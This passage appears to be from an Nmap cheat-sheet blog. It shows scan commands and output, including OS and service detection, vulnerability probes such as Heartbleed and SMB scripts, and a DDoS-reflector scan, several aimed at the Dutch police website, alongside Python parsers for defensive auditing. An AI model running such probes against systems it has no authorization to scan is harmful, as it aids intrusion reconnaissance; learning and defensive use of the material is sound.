Nmap done: 25 IP addresses (1 host up) scanned in 2.90 seconds

Nmap scan single hostname

ztik@unknownhost:~$ nmap www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 16:33 CET
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.024s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
 
Nmap done: 1 IP address (1 host up) scanned in 5.14 seconds

Nmap scan subnet

ztik@unknownhost:~$ nmap 10.0.2.0/24
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 16:33 CET
Nmap scan report for 10.0.2.15
Host is up (0.00036s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 256 IP addresses (1 host up) scanned in 3.64 seconds

Nmap scan from textfile

ztik@unknownhost:~$ nmap -iL scanlist.txt
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:33 CET
Nmap scan report for 10.0.2.15
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 25 IP addresses (1 host up) scanned in 2.53 seconds

Nmap scan specific port

ztik@unknownhost:~$ nmap -p 22 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:35 CET
Nmap scan report for 10.0.2.15
Host is up (0.00052s latency).
PORT   STATE SERVICE
22/tcp open  ssh
 
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

Nmap scan port range

ztik@unknownhost:~$ nmap -p 1-1024 10.0.2.15
 
Starting Nmap 6.47 ( http://nmap.org ) at 2017-02-19 06:26 CET
Nmap scan report for 10.0.2.15
Host is up (0.00041s latency).
Not shown: 1022 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds

Nmap scan 100 most common ports

ztik@unknownhost:~$ nmap -F 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:35 CET
Nmap scan report for 10.0.2.15
Host is up (0.00010s latency).
Not shown: 98 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

Nmap scan all 65535 ports

ztik@unknownhost:~$ nmap -p- 10.0.2.15
 
Starting Nmap 6.47 ( http://nmap.org ) at 2017-02-19 06:26 CET
Nmap scan report for 10.0.2.15
Host is up (0.00023s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
111/tcp   open  rpcbind
48715/tcp open  unknown
 
Nmap done: 1 IP address (1 host up) scanned in 2.11 seconds

Nmap TCP connect scan

ztik@unknownhost:~$ nmap -sT 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:36 CET
Nmap scan report for 10.0.2.15
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

Nmap TCP SYN scan

ztik@unknownhost:~$ nmap -sS 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:38 CET
Nmap scan report for 10.0.2.15
Host is up (0.0000060s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

Nmap UDP scan

ztik@unknownhost:~$ nmap -sU -p 68 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:38 CET
Nmap scan report for 10.0.2.15
Host is up.
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
 
Nmap done: 1 IP address (1 host up) scanned in 2.29 seconds

Nmap OS detection

ztik@unknownhost:~$ nmap -O 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:39 CET
Nmap scan report for 10.0.2.15
Host is up (0.000086s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.8 - 4.6
Network Distance: 0 hops
 
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.57 seconds

Nmap OS and Services detection

ztik@unknownhost:~$ nmap -A 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:39 CET
Nmap scan report for 10.0.2.15
Host is up (0.000056s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 2d:3c:fe:7a:85:c5:e0:28:ee:6e:80:eb:4b:2f:c6:b7 (DSA)
|   2048 2b:b2:c1:eb:57:ba:4e:f8:17:c2:91:d4:c8:42:09:66 (RSA)
|_  256 73:5f:36:69:02:e7:7e:7d:84:3f:a4:e1:e7:fd:67:2c (ECDSA)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          44560/tcp  status
|_  100024  1          56360/udp  status
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.8 - 4.6
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.71 seconds
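The scan reports above are all in Nmap's normal output format. As an added example (not part of the original page or of Nmap itself), the parser below turns that format into per-host records and compares the open ports against an expected baseline, which is the check a defender wants after scanning their own subnet. The host www.example.test / 192.0.2.10 and the baseline dictionary are constructed for the demo; the 10.0.2.15 lines are taken from the -A scan above.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

# Constructed sample: one real host from the scans above plus a made-up
# second host (documentation address 192.0.2.10) with a UDP port.
SAMPLE = """\
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:39 CET
Nmap scan report for 10.0.2.15
Host is up (0.000056s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|_  256 73:5f:36:69:02:e7:7e:7d:84:3f:a4:e1:e7:fd:67:2c (ECDSA)
111/tcp open  rpcbind 2-4 (RPC #100000)
Nmap scan report for www.example.test (192.0.2.10)
Host is up (0.0085s latency).
PORT    STATE         SERVICE  VERSION
123/udp open|filtered ntp
443/tcp open          ssl/http Edgecast ECD httpd
Nmap done: 2 IP addresses (2 hosts up) scanned in 11.71 seconds
"""

# "Nmap scan report for <name> (<ip>)" or just "Nmap scan report for <ip>"
REPORT_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\S+)\))?\s*$")
# "<port>/<proto>  <state>  <service>  [<version...>]"; NSE lines start with
# "|" and never match because the pattern requires a leading digit.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*\S))?\s*$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str = ""


@dataclass
class Host:
    name: str
    ip: str
    up: bool = False
    ports: List[Port] = field(default_factory=list)


def parse_nmap(text: str) -> List[Host]:
    """Parse normal-format Nmap output into Host records."""
    hosts: List[Host] = []
    current = None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            name, ip = m.group(1), m.group(2) or m.group(1)
            current = Host(name=name, ip=ip)
            hosts.append(current)
            continue
        if current is None:
            continue  # banner lines before the first report
        if line.startswith("Host is up"):
            current.up = True
            continue
        m = PORT_RE.match(line)
        if m:
            current.ports.append(Port(int(m.group(1)), m.group(2),
                                      m.group(3), m.group(4),
                                      m.group(5) or ""))
    return hosts


def open_ports(host: Host) -> List[Tuple[int, str]]:
    """Ports to treat as exposed. UDP probes cannot tell 'open' from
    'filtered', so 'open|filtered' is counted as exposed too."""
    return [(p.number, p.proto) for p in host.ports
            if p.state.startswith("open")]


def unexpected_ports(hosts: List[Host],
                     baseline: Dict[str, Set[Tuple[int, str]]]
                     ) -> Dict[str, List[Tuple[int, str]]]:
    """Return, per IP, the exposed ports that are not in the baseline.
    A host missing from the baseline has every exposed port reported."""
    findings: Dict[str, List[Tuple[int, str]]] = {}
    for h in hosts:
        extra = [p for p in open_ports(h) if p not in baseline.get(h.ip, set())]
        if extra:
            findings[h.ip] = extra
    return findings


if __name__ == "__main__":
    # Constructed baseline: only SSH is expected on 10.0.2.15.
    expected = {"10.0.2.15": {(22, "tcp")}}
    for ip, extra in unexpected_ports(parse_nmap(SAMPLE), expected).items():
        print(ip, "unexpected:", extra)
```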

Nmap default service detection

ztik@unknownhost:~$ sudo nmap -sV 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:40 CET
Nmap scan report for 10.0.2.15
Host is up (0.0000070s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
111/tcp open  rpcbind 2-4 (RPC #100000)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds

Nmap light service detection

ztik@unknownhost:~$ sudo nmap -sV --version-intensity 0 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:41 CET
Nmap scan report for 10.0.2.15
Host is up (0.0000070s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
111/tcp open  rpcbind 2-4 (RPC #100000)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.86 seconds

Nmap aggressive service detection

ztik@unknownhost:~$ sudo nmap -sV --version-intensity 5 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:42 CET
Nmap scan report for 10.0.2.15
Host is up (0.0000070s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
111/tcp open  rpcbind 2-4 (RPC #100000)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds

Nmap NSE safe script scan

ztik@unknownhost:~$ sudo nmap -sV -sC 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:45 CET
Nmap scan report for 10.0.2.15
Host is up (0.0000060s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 2d:3c:fe:7a:85:c5:e0:28:ee:6e:80:eb:4b:2f:c6:b7 (DSA)
|   2048 2b:b2:c1:eb:57:ba:4e:f8:17:c2:91:d4:c8:42:09:66 (RSA)
|_  256 73:5f:36:69:02:e7:7e:7d:84:3f:a4:e1:e7:fd:67:2c (ECDSA)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          44560/tcp  status
|_  100024  1          56360/udp  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.44 seconds

Nmap NSE script information

ztik@unknownhost:~$ nmap --script-help=vnc-brute
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:49 CET
 
vnc-brute
Categories: intrusive brute
https://nmap.org/nsedoc/scripts/vnc-brute.html
  Performs brute force password auditing against VNC servers.

Nmap NSE script scan (single script by name)

ztik@unknownhost:~$ nmap -sV -p 443 -script=ssl-heartbleed.nse www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:53 CET
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.0085s latency).
PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Edgecast ECD httpd
|_http-server-header: ECD (rtm/3514)
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.95 seconds

Nmap NSE script scan (wildcard script selection)

ztik@unknownhost:~$ nmap -sV --script=smb* 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:55 CET
Nmap scan report for 10.0.2.15
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          44560/tcp  status
|_  100024  1          56360/udp  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.97 seconds

Nmap UDP DDOS Reflector scan

ztik@unknownhost:~$ nmap -sU -A -PN -n -pU:19,53,123,161 -script=ntp-monlist,dns-recursion,snmp-sysdescr 10.0.2.0/24
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:58 CET
Nmap scan report for 10.0.2.2
Host is up (0.00025s latency).
PORT    STATE         SERVICE VERSION
19/udp  closed        chargen
53/udp  closed        domain
123/udp open|filtered ntp
161/udp closed        snmp
MAC Address: 52:54:00:12:35:02 (QEMU virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: HP FlexFabric 5900CP switch (Comware 7.1) (99%), Huawei S9300 switch (99%), Ricoh Aficio 3045/3245C or Savin 8025e printer (99%), Cisco 2950 switch (IOS 12.1) (97%), Cisco 2900-series switch (IOS 12.0) (97%), NetBSD 1.4.2 - 1.5.2; Lanier LS232c, NRG DSc428, Ricoh Aficio 2020, Ricoh NRG MP 161, or Savin 8055 printer; or Panasonic Network Camera (BB-HCM331, BB-HCM381, BCL-30A, BL-C1CE, or BL-C10CE) (97%), Lexmark C500 or C720 printer (97%), Nashuatec Aficio MP C3000 printer (97%), IRIX64 IRIS 6.5 (97%), SGI IRIX 6.5 (97%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 10.0.2.2
 
Nmap scan report for 10.0.2.3
Host is up (0.00016s latency).
PORT    STATE         SERVICE VERSION
19/udp  filtered      chargen
53/udp  filtered      domain
123/udp open|filtered ntp
161/udp filtered      snmp
MAC Address: 52:54:00:12:35:03 (QEMU virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: switch|general purpose|media device
Running: Cisco CatOS 7.X|8.X, HP Tru64 UNIX 5.X, Vantage embedded
OS CPE: cpe:/h:cisco:catalyst_ws-c6506 cpe:/o:cisco:catos:7.6 cpe:/o:cisco:catos:8.3 cpe:/o:hp:tru64:5.1a cpe:/h:vantage:hd7100s
OS details: Cisco Catalyst WS-C6506 switch (CatOS 7.6(16)), Cisco Catalyst switch (CatOS 8.3(2)), HP Tru64 UNIX 5.1A, Vantage HD7100S satellite receiver
Network Distance: 1 hop
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.16 ms 10.0.2.3
 
Nmap scan report for 10.0.2.4
Host is up (0.00042s latency).
PORT    STATE         SERVICE VERSION
19/udp  filtered      chargen
53/udp  filtered      domain
123/udp open|filtered ntp
161/udp filtered      snmp
MAC Address: 52:54:00:12:35:04 (QEMU virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: switch|general purpose|media device
Running: Cisco CatOS 7.X|8.X, HP Tru64 UNIX 5.X, Vantage embedded
OS CPE: cpe:/h:cisco:catalyst_ws-c6506 cpe:/o:cisco:catos:7.6 cpe:/o:cisco:catos:8.3 cpe:/o:hp:tru64:5.1a cpe:/h:vantage:hd7100s
OS details: Cisco Catalyst WS-C6506 switch (CatOS 7.6(16)), Cisco Catalyst switch (CatOS 8.3(2)), HP Tru64 UNIX 5.1A, Vantage HD7100S satellite receiver
Network Distance: 1 hop
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 10.0.2.4
 
Nmap scan report for 10.0.2.15
Host is up (0.00011s latency).
PORT    STATE  SERVICE VERSION
19/udp  closed chargen
53/udp  closed domain
123/udp closed ntp
161/udp closed snmp
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 115.08 seconds
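A scan like the one above produces a lot of text, and a defender checking their own ranges for UDP amplification services (chargen, DNS, NTP, SNMP) usually wants a machine-readable summary. The Python below is an added example, not part of this blog or of nmap: it parses nmap's normal output into per-host port lists and flags the hosts worth following up. The sample report is constructed in the shape of the output above (same host addresses, trimmed). Note that `open|filtered` only means no ICMP port-unreachable came back, so those hosts still need the script results (ntp-monlist, dns-recursion, snmp-sysdescr) to confirm that they actually answer.

```python
import re

# Constructed sample in the shape of nmap's normal output above: two of the
# hosts from the UDP reflector scan, trimmed to the lines the parser reads.
SAMPLE_REPORT = """\
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:58 CET
Nmap scan report for 10.0.2.2
Host is up (0.00025s latency).
PORT    STATE         SERVICE VERSION
19/udp  closed        chargen
53/udp  closed        domain
123/udp open|filtered ntp
161/udp closed        snmp
MAC Address: 52:54:00:12:35:02 (QEMU virtual NIC)

Nmap scan report for 10.0.2.15
Host is up (0.00011s latency).
PORT    STATE  SERVICE VERSION
19/udp  closed chargen
53/udp  closed domain
123/udp closed ntp
161/udp closed snmp
Too many fingerprints match this host to give specific OS details

Nmap done: 256 IP addresses (2 hosts up) scanned in 115.08 seconds
"""

# "Nmap scan report for 10.0.2.2" or "Nmap scan report for host.example (192.0.2.10)"
HOST_RE = re.compile(r"^Nmap scan report for (?P<name>\S+)(?: \((?P<ip>[^)]+)\))?$")
# "123/udp open|filtered ntp" or "22/tcp  open  ssh     OpenSSH 6.7p1 ..."
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# The four UDP services probed above; all four are classic amplification sources.
AMPLIFIERS = {"chargen", "domain", "ntp", "snmp"}


def parse_nmap_report(text):
    """Parse nmap normal output into {ip: [port dicts]}.

    Script output lines start with '|' and are skipped; only the port table
    rows and the per-host header are used.
    """
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group("ip") or m.group("name")
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service, version = m.groups()
            hosts[current].append({
                "port": int(port), "proto": proto, "state": state,
                "service": service, "version": (version or "").strip(),
            })
    return hosts


def reflector_candidates(hosts):
    """Hosts exposing an amplification service over UDP that is open or open|filtered.

    open|filtered only means no ICMP port-unreachable came back, so these are
    follow-up candidates for the NSE scripts, not confirmed reflectors.
    """
    found = {}
    for ip, ports in hosts.items():
        hits = [p for p in ports
                if p["proto"] == "udp" and p["service"] in AMPLIFIERS
                and p["state"] in ("open", "open|filtered")]
        if hits:
            found[ip] = sorted(f'{p["port"]}/udp {p["service"]} ({p["state"]})' for p in hits)
    return found


if __name__ == "__main__":
    for ip, services in reflector_candidates(parse_nmap_report(SAMPLE_REPORT)).items():
        print(ip, ", ".join(services))
```

The same parser works on the TCP scans earlier on this page, since the port-table row format is identical; only the `reflector_candidates` filter is specific to the UDP case.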

Nmap HTTP page title scan

ztik@unknownhost:~$ nmap --script=http-title 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:34 CET
Nmap scan report for 10.0.2.15
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 1 IP address (1 host up) scanned in 0.98 seconds
ztik@unknownhost:~$ nmap --script=http-title www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:34 CET
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.025s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
|_http-title: Did not follow redirect to https://www.politie.nl/
 
Nmap done: 1 IP address (1 host up) scanned in 10.10 seconds

Nmap HTTP web service header scan

ztik@unknownhost:~$ nmap --script=http-headers www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:36 CET
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.011s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
| http-headers: 
|   Accept-Ranges: bytes
|   Cache-Control: s-maxage=60, max-age=60
|   Content-Type: application/octet-stream
|   Date: Sun, 19 Feb 2017 17:36:30 GMT
|   Last-Modified: Sun, 19 Feb 2017 17:36:17 GMT
|   Location: https://www.politie.nl/
|   Server: ECD (rtm/3514)
|   Strict-Transport-Security: max-age=15768000
|   X-Cache: 301-HIT
|   X-Frame-Options: DENY
|   Content-Length: 0
|   Connection: close
|   
|_  (Request type: GET)
443/tcp open  https
| http-headers: 
|   Accept-Ranges: bytes
|   Cache-Control: s-maxage=60, max-age=60
|   Content-Type: text/html;charset=UTF-8
|   Date: Sun, 19 Feb 2017 17:36:30 GMT
|   Expires: Sun, 19 Feb 2017 17:46:30 GMT
|   Last-Modified: Sun, 19 Feb 2017 17:35:56 GMT
|   Server: ECD (rtm/3514)
|   Strict-Transport-Security: max-age=15768000
|   X-Cache: HIT
|   X-Frame-Options: DENY
|   X-UA-Compatible: IE=edge
|   Content-Length: 34065
|   Connection: close
|   
|_  (Request type: HEAD)
 
Nmap done: 1 IP address (1 host up) scanned in 7.62 seconds
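Beyond fingerprinting the server, the http-headers script is a cheap way to audit a site's own security headers. The Python below is an added example (my code, not from this blog or from the nmap project): it parses the http-headers NSE block for each port into a header map and reports what a hardening review would flag. The sample is constructed in the shape of the output above with a placeholder hostname. The thresholds (one-year max-age, includeSubDomains) are the hstspreload.org submission requirements, and the RFC 6797 point is that a Strict-Transport-Security header received over plain HTTP is ignored by browsers, so only the port 443 response matters for HSTS.

```python
import re

# Constructed sample in the shape of the http-headers output above, with a
# placeholder hostname; header values mirror the ones the scan returned.
SAMPLE_NSE = """\
PORT    STATE SERVICE
80/tcp  open  http
| http-headers: 
|   Cache-Control: s-maxage=60, max-age=60
|   Location: https://www.example.invalid/
|   Strict-Transport-Security: max-age=15768000
|   X-Frame-Options: DENY
|   Content-Length: 0
|   
|_  (Request type: GET)
443/tcp open  https
| http-headers: 
|   Content-Type: text/html;charset=UTF-8
|   Strict-Transport-Security: max-age=15768000
|   X-Frame-Options: DENY
|   X-UA-Compatible: IE=edge
|   Content-Length: 34065
|   
|_  (Request type: HEAD)
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
# NSE indents script output as "|   Name: value"; the last line starts with "|_".
HEADER_RE = re.compile(r"^\|[_ ]?\s*([A-Za-z0-9-]+):\s*(.*)$")

# Headers a hardening review expects on an HTML response, and why.
EXPECTED = {
    "strict-transport-security": "no HSTS, so http:// requests are not upgraded by the browser",
    "x-frame-options": "no clickjacking protection (or use CSP frame-ancestors)",
    "x-content-type-options": "MIME sniffing not disabled (nosniff)",
    "content-security-policy": "no CSP, so injected scripts run unconstrained",
}
ONE_YEAR = 31536000  # minimum HSTS max-age for the preload list


def parse_http_headers(nse_text):
    """Return {port: {lowercased header name: value}} from http-headers output."""
    result, port = {}, None
    for line in nse_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))
            result[port] = {}
            continue
        m = HEADER_RE.match(line)
        if m and port is not None and m.group(1).lower() != "http-headers":
            result[port][m.group(1).lower()] = m.group(2).strip()
    return result


def audit_headers(port, headers):
    """List the findings for one port's response headers (empty list = clean)."""
    findings = [f"{port}/tcp: {name} missing: {why}"
                for name, why in EXPECTED.items() if name not in headers]
    hsts = headers.get("strict-transport-security")
    if hsts is not None:
        m = re.search(r"max-age=(\d+)", hsts)
        max_age = int(m.group(1)) if m else 0
        if port == 80:
            # RFC 6797 section 8.1: a UA ignores STS received over non-secure transport.
            findings.append(f"{port}/tcp: HSTS over plain HTTP is ignored by browsers (RFC 6797); only the HTTPS response counts")
        if max_age < ONE_YEAR:
            findings.append(f"{port}/tcp: HSTS max-age={max_age} is below one year ({ONE_YEAR}), too short for preload")
        if "includesubdomains" not in hsts.lower():
            findings.append(f"{port}/tcp: HSTS lacks includeSubDomains")
    return findings


if __name__ == "__main__":
    for port, headers in parse_http_headers(SAMPLE_NSE).items():
        for finding in audit_headers(port, headers):
            print(finding)
```

A header-only audit says nothing about the content of a CSP or whether the redirect on port 80 is itself correct; it is a first pass that tells you which conversations to have with the site owner.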

Nmap HTTP web service enumeration scan

ztik@unknownhost:~$ nmap --script=http-enum www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:36 CET
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.012s latency).
All 1000 scanned ports on www.politie.nl (152.195.52.37) are filtered
 
Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds

Nmap SSL Heartbleed vulnerability scan

ztik@unknownhost:~$ nmap -sV -p 443 --script=ssl-heartbleed www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:41 CET
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.0096s latency).
PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Edgecast ECD httpd
|_http-server-header: ECD (rtm/3514)
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.23 seconds

Nmap IP information scan

ztik@unknownhost:~$ nmap --script=asn-query,whois-ip,ip-geolocation-maxmind 8.8.4.4
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:45 CET
NSE: [ip-geolocation-maxmind] You must specify a Maxmind database file with the maxmind_db argument.
NSE: [ip-geolocation-maxmind] Download the database from http://dev.maxmind.com/geoip/legacy/geolite/
Nmap scan report for google-public-dns-b.google.com (8.8.4.4)
Host is up (0.027s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
53/tcp open  domain
 
Host script results:
| asn-query: 
| BGP: 8.8.4.0/24 | Country: US
|   Origin AS: 15169 - GOOGLE - Google Inc., US
|_    Peer AS: 1103 1239 2381 3257 3910 6453
| whois-ip: Record found at whois.arin.net
| netrange: 8.8.4.0 - 8.8.4.255
| netname: LVLT-GOGL-8-8-4
| orgname: Google Inc.
| orgid: GOGL
| country: US stateprov: CA
| orgtechname: Google Inc
|_orgtechemail: arin-contact@google.com
 
Nmap done: 1 IP address (1 host up) scanned in 9.94 seconds

Nmap Domain information scan

ztik@unknownhost:~$ nmap --script=asn-query,whois-domain,ip-geolocation-maxmind www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 18:45 CET
NSE: [ip-geolocation-maxmind] You must specify a Maxmind database file with the maxmind_db argument.
NSE: [ip-geolocation-maxmind] Download the database from http://dev.maxmind.com/geoip/legacy/geolite/
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.012s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
 
Host script results:
| asn-query: 
| BGP: 152.195.52.0/24 | Country: US
|   Origin AS: 15133 - EDGECAST - MCI Communications Services, Inc. d/b/a Verizon Business, US
|_    Peer AS: 1103 1299 2914 6762 33891
| whois-domain: 
| 
| Domain name record found at whois.domain-registry.nl
| Domain name: politie.nl\x0D
| Status:      active\x0D
| \x0D
| Registrar:\x0D
|    KPN  Corporate Market\x0D
|    Paalbergweg 13\x0D
|    1105AG AMSTERDAM ZUIDOOST\x0D
|    Netherlands\x0D
| \x0D
| DNSSEC:      yes\x0D
| \x0D
| Domain nameservers:\x0D
|    ns2.isc.nl\x0D
|    ns.megaplex.nl\x0D
|    ns1.megaplex.nl\x0D
|    ns1.pinkroccade.net\x0D
| \x0D
| Record maintained by: NL Domain Registry\x0D
| \x0D
| Copyright notice\x0D
| No part of this publication may be reproduced, published, stored in a\x0D
| retrieval system, or transmitted, in any form or by any means,\x0D
| electronic, mechanical, recording, or otherwise, without prior\x0D
| permission of the Foundation for Internet Domain Registration in the\x0D
| Netherlands (SIDN).\x0D
| These restrictions apply equally to registrars, except in that\x0D
| reproductions and publications are permitted insofar as they are\x0D
| reasonable, necessary and solely in the context of the registration\x0D
| activities referred to in the General Terms and Conditions for .nl\x0D
| Registrars.\x0D
| Any use of this material for advertising, targeting commercial offers or\x0D
| similar activities is explicitly forbidden and liable to result in legal\x0D
| action. Anyone who is aware or suspects that such activities are taking\x0D
| place is asked to inform the Foundation for Internet Domain Registration\x0D
